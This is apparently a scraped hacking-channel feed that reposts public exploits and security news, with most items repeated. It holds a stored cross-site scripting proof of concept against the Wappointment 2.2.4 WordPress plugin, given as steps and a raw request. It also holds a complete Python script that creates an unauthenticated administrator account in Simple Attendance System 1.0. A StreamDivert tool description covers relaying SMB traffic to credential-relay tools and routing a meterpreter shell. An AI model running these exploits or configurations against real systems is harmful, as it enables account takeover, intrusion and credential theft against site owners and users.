Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
WordPress Wappointment 2.2.4 Cross Site Scripting
https://3.bp.blogspot.com/-sRAbWielMtM/WWlvVvmDA-I/AAAAAAAAIN8/PunzJUFKKskcHl_zTOrA6xP6ETTvhbejQCLcBGAs/s1600/h46.png
WordPress Wappointment plugin version 2.2.4 suffers from a persistent cross site scripting vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
WordPress Wappointment 2.2.4 Cross Site Scripting
https://3.bp.blogspot.com/-sRAbWielMtM/WWlvVvmDA-I/AAAAAAAAIN8/PunzJUFKKskcHl_zTOrA6xP6ETTvhbejQCLcBGAs/s1600/h46.png
WordPress Wappointment plugin version 2.2.4 suffers from a persistent cross site scripting vulnerability.
MD5 |
06d4d37cea6659e1b1dea2a83e10132fDownload
# Exploit Title: WordPress Plugin Wappointment 2.2.4 - Stored Cross-Site Scripting (XSS)
# Date: 2021-07-31
# Exploit Author: Renos Nikolaou
# Software Link: https://downloads.wordpress.org/plugin/wappointment.2.2.4.zip
# Version: 2.2.4
# Tested on: Windows
# Description : Wappointment is prone to Stored Cross Site Scripting vulnerabilities
# because it fails to properly sanitize user-supplied input.
# PoC - Stored XSS - Parameter: name
# 1) Open Wappointment Plugin or Visit booking-page http://localhost/booking-page
# 2) Click on any available delivery modality (By Phone, At a Location, Video Meeting or By Skype)
# 3) Select Date and Time, write your email address, your phone number and in the Full Name field type: testname">x
# 4) Click Confirm
# 5) Login as admin to wp-admin portal, Go to Wappointment --> Calendar ( http://localhost/wordpress/wp-admin/admin.php?page=wappointment_calendar )
# Post Request (Step 4):
POST /wordpress/wp-json/wappointment/v1/services/booking HTTP/1.1
Host: domain.com
Content-Length: 205
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Type: application/json
Origin: http://domain.com
Referer: http://domain.com/wordpress/booking-page/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
{"email":"testemail@testemail.com","name":"testname\">x ","phone":"+00 00 000000","time":1630666800,"ctz":"Europe/Bucharest","service":1,"location":3,"duration":90,"staff_id":2}
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
WordPress Wappointment 2.2.4 Cross Site Scripting
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Simple Attendance System 1.0 Authentication Bypass
https://1.bp.blogspot.com/-qwhQ-DvjXeo/WWlvAVNcU1I/AAAAAAAAIKM/AQaWmoLkqQQ6jMUPY28Kv2eNsZnw7PnKQCLcBGAs/s1600/h122.png
Simple Attendance System version 1.0 authentication bypass exploit that adds an administrator.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Simple Attendance System 1.0 Authentication Bypass
https://1.bp.blogspot.com/-qwhQ-DvjXeo/WWlvAVNcU1I/AAAAAAAAIKM/AQaWmoLkqQQ6jMUPY28Kv2eNsZnw7PnKQCLcBGAs/s1600/h122.png
Simple Attendance System version 1.0 authentication bypass exploit that adds an administrator.
MD5 |
b2f87481c6c45cf469745634e60b237dDownload
# Exploit Title: Simple Attendance System v1.0 - Unauthenticated Add Admin Account
# Exploit Author: Richard Jones
# Date: September 26, 2021
# Vendor Homepage: https://www.sourcecodester.com/php/14948/simple-attendance-system-php-and-sqlite-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14948&title=Simple+Attendance+System+in+PHP+and+SQLite+Free+Source+Code
# Tested on: Kali Linux, Apache, Mysql
# Vendor: oretnom23
# Version: v1.0
# Exploit Description:
# Simple Attendance System v1.0 v1.0 suffers Unauthenticated Add Administration Account. We can craft a post request to add an admin account to the applicaiton without authentication.
# Usage: python3 attendance_poc.py -u admin1 -p admin1 -url http://localhost/attendance/
# Then login to the app at http://localhost/attendance/login.php to be logged as admin.
import requests
import argparse
def createAccount(args):
try:
data = f'id=&fullname={args.username}&username={args.password}&type=1'
headers = {"Content-Type": "application/x-www-form-urlencoded"}
r = requests.post(url=f"{args.host}Actions.php?a=save_user", data=data, headers=headers)
if r. status_code == 200:
resp = r.text
if "Username already exists." in resp:
print(f"Username \"{args.username}\" taken!\nChange it and try again. ")
if "New User successfully saved." in resp:
print("Created User")
print(f"Username: {args.username}\nPassword: {args.password}")
print(f"\nPlease try to login here: {args.url}login.php")
except:
print("Unknown Error, Check URL and try again.")
def main():
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--username", help="Username to create", required=True)
parser.add_argument("-p", "--password", help="Password for the user account", required=True)
parser.add_argument("-url", "--host", help="Host for the webapp eg: http://localhost/attendance/ <<
args = parser.parse_args()
createAccount(args)
if __name__ == "__main__":
main()
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Simple Attendance System 1.0 Authentication Bypass
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
”حمولات#XSS التي يمكن استخدامها في سياقات مختلفة “.
https://medium.com/@kdiix0gamer/%D8%AD%D9%85%D9%88%D9%84%D8%A7%D8%AA-xss-%D8%A7%D9%84%D8%AA%D9%8A-%D9%8A%D9%85%D9%83%D9%86-%D8%A7%D8%B3%D8%AA%D8%AE%D8%AF%D8%A7%D9%85%D9%87%D8%A7-%D9%81%D9%8A-%D8%B3%D9%8A%D8%A7%D9%82%D8%A7%D8%AA-%D9%85%D8%AE%D8%AA%D9%84%D9%81%D8%A9-9943c536b04?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://medium.com/@kdiix0gamer/%D8%AD%D9%85%D9%88%D9%84%D8%A7%D8%AA-xss-%D8%A7%D9%84%D8%AA%D9%8A-%D9%8A%D9%85%D9%83%D9%86-%D8%A7%D8%B3%D8%AA%D8%AE%D8%AF%D8%A7%D9%85%D9%87%D8%A7-%D9%81%D9%8A-%D8%B3%D9%8A%D8%A7%D9%82%D8%A7%D8%AA-%D9%85%D8%AE%D8%AA%D9%84%D9%81%D8%A9-9943c536b04?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
”حمولات#XSS التي يمكن استخدامها في سياقات مختلفة “.
#XSS Payloads that can be used in different contexts.”
#XSS Payloads that can be used in different contexts.”Continue reading on Medium » (https://medium.com/@kdiix0gamer/%D8%AD%D9%85%D9%88%D9%84%D8%A7%D8%AA-xss-%D8%A7%D9%84%D8%AA%D9%8A-%D9%8A%D9%85%D9%83%D9%86-%D8%A7%D8%B3%D8%AA%D8%AE%D8%AF%D8%A7%D9%85%D9%87%D8%A7-%D9%81%D9%8A-%D8%B3%D9%8A%D8%A7%D9%82%D8%A7%D8%AA-%D9%85%D8%AE%D8%AA%D9%84%D9%81%D8%A9-9943c536b04?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
”حمولات#XSS التي يمكن استخدامها في سياقات مختلفة “.
#XSS Payloads that can be used in different contexts.”
Challenges a loophole through the xss website programming that walks with you step by step
https://medium.com/@kdiix0gamer/challenges-a-loophole-through-the-xss-website-programming-that-walks-with-you-step-by-step-bc640bcb5598?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://medium.com/@kdiix0gamer/challenges-a-loophole-through-the-xss-website-programming-that-walks-with-you-step-by-step-bc640bcb5598?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
Challenges a loophole through the xss website programming that walks with you step by step
website: hackernap.com/lab/Xss-labs
website: hackernap.com/lab/Xss-labsContinue reading on Medium » (https://medium.com/@kdiix0gamer/challenges-a-loophole-through-the-xss-website-programming-that-walks-with-you-step-by-step-bc640bcb5598?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Dark Reading: Attacks/Breaches
Aunalytics Unveils Secure Managed Services with Integrated Security
New service stack combines mission critical IT services leveraging zero trust end-to-end security to ensure people and data are protected regardless of location.
___________________________
@hacking_Attack
@Hacking_Video
Aunalytics Unveils Secure Managed Services with Integrated Security
New service stack combines mission critical IT services leveraging zero trust end-to-end security to ensure people and data are protected regardless of location.
___________________________
@hacking_Attack
@Hacking_Video
Dark Reading
Aunalytics Unveils Secure Managed Services with Integrated Security
New service stack combines mission critical IT services leveraging zero trust end-to-end security to ensure people and data are protected regardless of location.
Dark Reading: Attacks/Breaches
Zero Trust Comes to Industry's Broadest Cybersecurity Platform
Trend Micro Zero Trust Risk Insights continuously reveals and prioritizes risks for better decision making.
___________________________
@hacking_Attack
@Hacking_Video
Zero Trust Comes to Industry's Broadest Cybersecurity Platform
Trend Micro Zero Trust Risk Insights continuously reveals and prioritizes risks for better decision making.
___________________________
@hacking_Attack
@Hacking_Video
Dark Reading
Zero Trust Comes to Industry's Broadest Cybersecurity Platform
Trend Micro Zero Trust Risk Insights continuously reveals and prioritizes risks for better decision making.
Dark Reading: Attacks/Breaches
Telos, Splunk, stackArmor, AWS Announce FASTTR Initiative to Accelerate Compliance
FASTTR initiative enhances stackArmor's ThreatAlert by building on market-leading Telos' Xacta for security compliance documentation and Splunk for security information and event management.
___________________________
@hacking_Attack
@Hacking_Video
Telos, Splunk, stackArmor, AWS Announce FASTTR Initiative to Accelerate Compliance
FASTTR initiative enhances stackArmor's ThreatAlert by building on market-leading Telos' Xacta for security compliance documentation and Splunk for security information and event management.
___________________________
@hacking_Attack
@Hacking_Video
Dark Reading
Telos, Splunk, stackArmor, AWS Announce FASTTR Initiative to Accelerate Compliance
FASTTR initiative enhances stackArmor's ThreatAlert by building on market-leading Telos' Xacta for security compliance documentation and Splunk for security information and event management.
Dark Reading: Attacks/Breaches
BloodyStealer: Advanced New Trojan Targets Accounts of Popular Online Gaming Platforms
Kaspersky researchers have discovered an advanced Trojan, dubbed BloodyStealer, sold on darknet forums and used to steal gamers’ accounts on popular gaming platforms, including Steam, Epic Games Store, and EA Origin.
___________________________
@hacking_Attack
@Hacking_Video
BloodyStealer: Advanced New Trojan Targets Accounts of Popular Online Gaming Platforms
Kaspersky researchers have discovered an advanced Trojan, dubbed BloodyStealer, sold on darknet forums and used to steal gamers’ accounts on popular gaming platforms, including Steam, Epic Games Store, and EA Origin.
___________________________
@hacking_Attack
@Hacking_Video
Dark Reading
BloodyStealer: Advanced New Trojan Targets Accounts of Popular Online Gaming Platforms
Kaspersky researchers have discovered an advanced Trojan, dubbed BloodyStealer, sold on darknet forums and used to steal gamers’ accounts on popular gaming platforms, including Steam, Epic Games Store, and EA Origin.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Learn to hack by doing ctf’s
Hello Friend,
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Learn to hack by doing ctf’s
Hello Friend,
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Learn to hack by doing ctf’s
Hello Friend,
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
A Deep Learning Approach to Web Application Firewall
https://cdn-images-1.medium.com/max/600/1*nOOBZ5UTFETrBzAmrbGqeQ.png
Abstract
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
A Deep Learning Approach to Web Application Firewall
https://cdn-images-1.medium.com/max/600/1*nOOBZ5UTFETrBzAmrbGqeQ.png
Abstract
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
A Deep Learning Approach to Web Application Firewall
Abstract
StreamDivert - Redirecting (Specific) TCP, UDP And ICMP Traffic To Another Destination
StreamDivert is a tool to man-in-the-middle or relay in and outgoing network connections on a system. It has the ability to, for example, relay all incoming SMB connections to port 445 to another server, or only relay specific incoming SMB connections from a specific set of source IP's to another server. Summed up, StreamDivert is able to: Relay all incoming connections to a specific port to another destination. Relay incoming connections from a specific source IP to a port to another destination. Relay incoming connections to a SOCKS(4/5) server. Relay all outgoing connections to a specific port to another destination. Relay outgoing connections to a specific IP and port to another destination. Handle TCP, UDP and ICMP traffic over IPv4 and IPv6. Force redirected packets over a specific network interface.Download Binaries Pre-compiled binaries for StreamDivert can be downloaded here. Usage How do you use StreamDivert? Run the the tool with administrative privileges: streamdivert.exe config_file -f -v The config file contains entries for streams you want to have diverted. En example config file: //Divert all inbound TCP connections to port 445 (SMB) coming from 10.0.1.50 to 10.0.1.49 port 445 tcp < 445 10.0.1.50 -> 10.0.1.49 445 //Divert all inbound TCP connections to port 445 (SMB) coming from 10.0.1.51 to a local SOCKS server tcp < 445 10.0.1.51 -> socks //Divert all inbound TCP connections to port 445 (SMB) coming from fe80::f477:846a:775d:d37 to fe80::20c:29ff:fe6f:88ff port 445 tcp < 445 fe80::f477:846a:775d:d37 -> fe80::20c:29ff:fe6f:88ff 445 //Divert all inbound TCP connections to port 445 (SMB) to 10.0.1.48 port 445 tcp < 445 0.0.0.0 -> 10.0.1.48 445 //Divert all inbound UDP connections to to port 53 (DNS) to 10.0.1.49 port 53 udp < 53 0.0.0.0 -> 10.0.1.49 53 //Divert all inbound ICMP packets coming from 10.0.1.50 to 10.0.1.49 icmp < 10.0.1.50 -> 10.0.1.49 //Divert all outbound TCP connections to 10.0.1.50, port 80 to 10.0.1.49 port 8080 tcp > 10.0.1.50 80 -> 10.0.1.49 8080 //Send all packets going to 10.0.1.50 port 80 and prefer interface 9 to send them. If the interface does not exist or is not up, the packets are send from the default interface. tcp > 10.0.1.50 80 -> 10.0.1.50 80 interface 9 //Force all packets going to 10.0.1.50 port 80 over interface 9, or drop the packets if the interface does not exist or is not up. tcp > 10.0.1.50 80 -> 10.0.1.50 80 force interface 9 //Divert all outbound UDP connection to port 53 (DNS) to 10.0.1.49 port 53 udp > 0.0.0.0 53 -> 10.0.1.49 53 The -f flag, when present, will modify the Windows Firewall to add an exception for the application to properly redirect incoming traffic to another port. The -v flag control the logging verbosity. When provided, StreamDivert will log details about redirected packets and streams. Some Use Cases Diverting outbound C&C traffic to a local socket for dynamic malware analysis. Diverting inbound SMB connections of a compromised host to Responder/ ntlmrelayx (usefull in penetration tests). Routing traffic over reserved ports. Usefull when a network firewall is in between. For example... Routing a meterpreter shell over port 445. Running a SOCKS server on port 3389. ... Help! My packets/ connections are not correctly diverted! One thing to keep in mind when configuring diverted connections is that you don't have conflicting diverted streams. Given the following example config file: icmp < 0.0.0.0 -> 10.0.1.50 icmp > 10.0.1.49 -> 10.0.1.48 Those two diverted streams will conflict with eachother, as packets for the first diverted stream will also be picked up by the second packet 'diverter'. Generally you will only run into these issues with UDP and ICMP and using wildcards. Also note that diverting an IPv4 to an IPv6 address and vice versa is not supported for UDP and ICMP traffic. Contributing to StreamDivert Features wanted: IP range support ... Download StreamDivert
Read more...
___________________________
@hacking_Attack
@Hacking_Video
StreamDivert is a tool to man-in-the-middle or relay in and outgoing network connections on a system. It has the ability to, for example, relay all incoming SMB connections to port 445 to another server, or only relay specific incoming SMB connections from a specific set of source IP's to another server. Summed up, StreamDivert is able to: Relay all incoming connections to a specific port to another destination. Relay incoming connections from a specific source IP to a port to another destination. Relay incoming connections to a SOCKS(4/5) server. Relay all outgoing connections to a specific port to another destination. Relay outgoing connections to a specific IP and port to another destination. Handle TCP, UDP and ICMP traffic over IPv4 and IPv6. Force redirected packets over a specific network interface.Download Binaries Pre-compiled binaries for StreamDivert can be downloaded here. Usage How do you use StreamDivert? Run the the tool with administrative privileges: streamdivert.exe config_file -f -v The config file contains entries for streams you want to have diverted. En example config file: //Divert all inbound TCP connections to port 445 (SMB) coming from 10.0.1.50 to 10.0.1.49 port 445 tcp < 445 10.0.1.50 -> 10.0.1.49 445 //Divert all inbound TCP connections to port 445 (SMB) coming from 10.0.1.51 to a local SOCKS server tcp < 445 10.0.1.51 -> socks //Divert all inbound TCP connections to port 445 (SMB) coming from fe80::f477:846a:775d:d37 to fe80::20c:29ff:fe6f:88ff port 445 tcp < 445 fe80::f477:846a:775d:d37 -> fe80::20c:29ff:fe6f:88ff 445 //Divert all inbound TCP connections to port 445 (SMB) to 10.0.1.48 port 445 tcp < 445 0.0.0.0 -> 10.0.1.48 445 //Divert all inbound UDP connections to to port 53 (DNS) to 10.0.1.49 port 53 udp < 53 0.0.0.0 -> 10.0.1.49 53 //Divert all inbound ICMP packets coming from 10.0.1.50 to 10.0.1.49 icmp < 10.0.1.50 -> 10.0.1.49 //Divert all outbound TCP connections to 10.0.1.50, port 80 to 10.0.1.49 port 8080 tcp > 10.0.1.50 80 -> 10.0.1.49 8080 //Send all packets going to 10.0.1.50 port 80 and prefer interface 9 to send them. If the interface does not exist or is not up, the packets are send from the default interface. tcp > 10.0.1.50 80 -> 10.0.1.50 80 interface 9 //Force all packets going to 10.0.1.50 port 80 over interface 9, or drop the packets if the interface does not exist or is not up. tcp > 10.0.1.50 80 -> 10.0.1.50 80 force interface 9 //Divert all outbound UDP connection to port 53 (DNS) to 10.0.1.49 port 53 udp > 0.0.0.0 53 -> 10.0.1.49 53 The -f flag, when present, will modify the Windows Firewall to add an exception for the application to properly redirect incoming traffic to another port. The -v flag control the logging verbosity. When provided, StreamDivert will log details about redirected packets and streams. Some Use Cases Diverting outbound C&C traffic to a local socket for dynamic malware analysis. Diverting inbound SMB connections of a compromised host to Responder/ ntlmrelayx (usefull in penetration tests). Routing traffic over reserved ports. Usefull when a network firewall is in between. For example... Routing a meterpreter shell over port 445. Running a SOCKS server on port 3389. ... Help! My packets/ connections are not correctly diverted! One thing to keep in mind when configuring diverted connections is that you don't have conflicting diverted streams. Given the following example config file: icmp < 0.0.0.0 -> 10.0.1.50 icmp > 10.0.1.49 -> 10.0.1.48 Those two diverted streams will conflict with eachother, as packets for the first diverted stream will also be picked up by the second packet 'diverter'. Generally you will only run into these issues with UDP and ICMP and using wildcards. Also note that diverting an IPv4 to an IPv6 address and vice versa is not supported for UDP and ICMP traffic. Contributing to StreamDivert Features wanted: IP range support ... Download StreamDivert
Read more...
___________________________
@hacking_Attack
@Hacking_Video